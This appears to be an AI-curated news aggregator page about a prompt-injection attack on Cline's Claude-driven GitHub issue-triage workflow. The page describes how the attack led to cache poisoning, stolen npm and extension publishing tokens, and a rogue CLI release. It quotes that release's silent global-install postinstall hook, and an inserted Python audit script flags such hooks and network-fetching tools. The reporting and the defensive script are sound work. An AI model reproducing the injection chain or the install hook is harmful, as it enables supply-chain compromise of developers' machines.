Hacker tricks Cline into spreading OpenClaw

📰Read original on The Verge

💡Cline vuln lets hackers spread rogue AI agents—audit your coding tools now!

⚡ 30-Second TL;DR

What changed

Hacker used prompt injection on Cline's Claude integration

Why it matters

Developers relying on AI coding agents face new supply-chain attack vectors via prompt manipulation. This could erode trust in tools like Cline, prompting stricter safeguards in agentic workflows.

What to do next

Audit Cline installations for an unexpected global OpenClaw install, and use Adnan Khan's proof of concept to check your own workflows for the prompt injection vulnerability and patch it.

Who should care: Developers & AI Engineers

🧠 Deep Insight

Web-grounded analysis with 5 cited sources.

🔑 Key Takeaways

  • A hacker exploited a prompt injection vulnerability in Cline's Claude Issue Triage GitHub Actions workflow, active from Dec 21, 2025 to Feb 9, 2026, to steal npm, VSCE, and OVSX publishing tokens via cache poisoning[1][3].
  • On February 17, 2026, the attacker published malicious Cline CLI version 2.3.0 to npm, which included a postinstall script silently installing the legitimate OpenClaw AI agent globally on users' systems[1][3][4].
  • The malicious version remained live for about 8 hours until the Cline team published fixed version 2.4.0 and deprecated 2.3.0; the advisory rated the severity 'low' since OpenClaw is open-source, while highlighting the supply chain risk[1][2][4].

🛠️ Technical Deep Dive

  • Prompt injection targeted Cline's Claude Issue Triage workflow (removed after the incident), allowing GitHub account holders to inject malicious instructions that chained into GitHub Actions cache poisoning[3].
  • The cache poisoning step used tools like Cacheract to flush and evict the cache, then pivoted to the Publish Nightly Release and NPM workflows to steal the VSCE_PAT, OVSX_PAT and NPM_RELEASE_TOKEN secrets, which carried production-level access[3].
  • The malicious npm package 2.3.0 modified only package.json, adding the lifecycle script 'postinstall': 'npm install -g openclaw@latest'; the CLI binary dist/cli.mjs was unchanged from the legitimate 2.2.0[1].
  • Attack drew from public research like Aikido Security’s PromptPwned on AI workflow misconfigurations[3].
  • Cline CLI 2.0 features AI agent control in terminal with parallel execution, headless CI/CD, ACP editor support[5].
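As a defensive illustration of the postinstall trick described above, here is an added audit script (not Cline's code, not Adnan Khan's proof of concept) that inspects a package.json for npm lifecycle hooks that install packages globally or fetch remote code, and flags the version the advisory names. The sample manifests are constructed from the page's description; the npm package name `cline` and the `build` script are assumptions.

```python
import json
import re
import shlex

# Lifecycle hooks npm runs automatically during `npm install`, with no user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
# Version the advisory identifies as malicious (from the page); package name is assumed.
KNOWN_BAD = {("cline", "2.3.0")}

def _commands(script: str):
    """Split a shell one-liner into its component commands (&&, ||, ;, |)."""
    return [c.strip() for c in re.split(r"&&|\|\||;|\|", script) if c.strip()]

def suspicious_commands(script: str):
    """Return the sub-commands of a lifecycle script that install software globally
    or download/run remote code. Ordinary build steps (`tsc`, `node build.js`) pass."""
    hits = []
    for cmd in _commands(script):
        try:
            argv = shlex.split(cmd)
        except ValueError:
            hits.append(cmd)  # unparseable shell: treat as suspicious
            continue
        if not argv:
            continue
        tool = argv[0].rsplit("/", 1)[-1]
        # npm install -g / npm i --global / pnpm add -g / yarn global add
        if tool in ("npm", "pnpm", "yarn") and any(a in ("-g", "--global", "global") for a in argv[1:]):
            hits.append(cmd)
        elif tool in ("curl", "wget", "npx"):  # fetches or executes code from the network
            hits.append(cmd)
    return hits

def audit_package_json(text: str):
    """Audit a package.json string; return a list of (reason, detail) findings."""
    pkg = json.loads(text)
    findings = []
    if (pkg.get("name"), pkg.get("version")) in KNOWN_BAD:
        findings.append(("known-bad-version", f'{pkg["name"]}@{pkg["version"]}'))
    for hook in LIFECYCLE_HOOKS:
        script = pkg.get("scripts", {}).get(hook)
        if script:
            for cmd in suspicious_commands(script):
                findings.append((f"lifecycle:{hook}", cmd))
    return findings

# Constructed samples modelled on the page: 2.3.0 differs from 2.2.0 only by the postinstall hook.
MALICIOUS_230 = json.dumps({"name": "cline", "version": "2.3.0", "bin": {"cline": "dist/cli.mjs"},
                            "scripts": {"build": "tsc", "postinstall": "npm install -g openclaw@latest"}})
CLEAN_220 = json.dumps({"name": "cline", "version": "2.2.0", "bin": {"cline": "dist/cli.mjs"},
                        "scripts": {"build": "tsc"}})

if __name__ == "__main__":
    for label, doc in (("2.3.0", MALICIOUS_230), ("2.2.0", CLEAN_220)):
        print(label, audit_package_json(doc) or "clean")
```

Run it against `node_modules/<pkg>/package.json` for installed packages, or against the tarball's manifest before installing; a lifecycle hook that reaches for `-g` is a strong signal on its own, whatever the version.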

🔮 Future Implications

AI analysis grounded in cited sources

This supply chain attack, driven by AI prompt injection in a CI/CD pipeline, signals heightened risk from autonomous AI agents in developer tools, which can be turned toward credential theft or malware distribution, and it accelerates scrutiny of npm and GitHub Actions security and of trust in AI-assisted automation[1][2][3].

⏳ Timeline

2025-12-21
Prompt injection vulnerability in Cline's Claude Issue Triage workflow becomes active
2026-01-01
Adnan Khan reports Clinejection vulnerability with proof-of-concept
2026-01
ClawHavoc attack plants malicious skills on OpenClaw's ClawHub marketplace
2026-02-09
Cline removes vulnerable Claude Issue Triage workflow
2026-02-17
Attacker publishes malicious Cline CLI v2.3.0 with OpenClaw postinstall script; fixed v2.4.0 released same day

📎 Sources (5)

Factual claims are grounded in the sources below. Forward-looking analysis is AI-generated interpretation.

  1. awesomeagents.ai
  2. enterprisesecuritytech.com
  3. adnanthekhan.com
  4. cybersecuritynews.com
  5. devops.com

A hacker exploited a vulnerability in Cline, a popular open-source AI coding agent, to install the viral OpenClaw AI agent everywhere. The flaw, recently surfaced by security researcher Adnan Khan, involves sneaky instructions fed to Anthropic's Claude model in Cline's workflow. This stunt signals rising risks as autonomous AI agents gain access to user computers.

Key Points

  1. Hacker used prompt injection on Cline's Claude integration
  2. Installed OpenClaw AI agent across developer systems
  3. Vulnerability proof-of-concept by Adnan Khan days prior
  4. Highlights dangers of autonomous AI on user machines

Technical Details

Cline's workflow fed user-supplied instructions to Claude, enabling jailbreak-style prompts to trigger unauthorized actions such as installing OpenClaw. The vulnerability allowed the safeguards intended to constrain the model's response generation to be bypassed.


AI-curated news aggregator. All content rights belong to original publishers.
Original source: The Verge